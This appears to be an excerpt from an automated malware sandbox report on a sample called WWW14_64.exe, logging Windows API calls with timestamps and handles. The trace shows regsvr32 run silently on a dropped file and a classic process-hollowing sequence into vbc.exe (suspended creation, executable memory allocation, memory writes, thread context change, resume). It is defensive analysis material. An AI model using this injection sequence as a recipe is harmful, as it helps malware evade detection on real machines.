NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000258 suspend_count: 1 process_identifier: 2732	1	0
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 2180 thread_handle: 0x000002a4 process_identifier: 2140 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\regsvr32.exe track: 1 command_line: "C:\Windows\System32\regsvr32.exe" -s F652w.85 filepath_r: C:\Windows\System32\regsvr32.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a0	1	1
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 2140	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000001d0 suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000001d4 suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000037c suspend_count: 1 process_identifier: 2916	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2916	1	0
CreateProcessInternalW Sept. 14, 2023, 7:16 p.m.	thread_identifier: 748 thread_handle: 0x00000048 process_identifier: 1960 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000004c	1	1
NtGetContextThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000048	1	0
NtAllocateVirtualMemory Sept. 14, 2023, 7:16 p.m.	process_identifier: 1960 region_size: 368640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000004c	1	0
WriteProcessMemory Sept. 14, 2023, 7:16 p.m.	buffer: base_address: 0x00400000 process_identifier: 1960 process_handle: 0x0000004c	1	1
WriteProcessMemory Sept. 14, 2023, 7:16 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1960 process_handle: 0x0000004c	1	1
NtSetContextThread Sept. 14, 2023, 7:16 p.m.	registers.eip: 2005598660 registers.esp: 6618964 registers.edi: 0 registers.eax: 4510638 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000048 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000048 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000001c8 suspend_count: 1 process_identifier: 2924	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2968	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2968	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000001c8 suspend_count: 1 process_identifier: 2968	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000250 suspend_count: 1 process_identifier: 2968	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000308 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000003a0 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x000003d8 suspend_count: 1 process_identifier: 1960	1	0
NtResumeThread Sept. 14, 2023, 7:16 p.m.	thread_handle: 0x00000390 suspend_count: 1 process_identifier: 1960	1	0

WWW14_64.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All